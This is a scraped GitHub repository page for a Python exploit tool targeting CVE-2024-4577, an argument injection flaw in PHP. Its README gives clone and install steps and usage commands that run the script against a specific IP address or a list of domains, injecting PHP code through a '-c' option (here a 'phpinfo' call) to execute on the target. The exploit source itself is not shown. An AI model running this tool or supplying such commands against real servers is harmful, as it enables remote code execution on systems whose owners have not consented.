Skip to content

Argument injection vulnerability in PHP

Notifications You must be signed in to change notification settings

x0root/CVE-2024-4577

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2024-4577

Argument injection vulnerability in PHP

INSTALL

git clone https://github.com/gotr00t0day/CVE-2024-4577.git

cd CVE-2024-4577

pip3 install -r requirements.txt

USAGE

# Scan A Target

python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"

# Scan a list of Targets

python3 CVE-2024-4577.py -f domains.txt -c  "<?phpphpinfo();?>"

About

Argument injection vulnerability in PHP

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%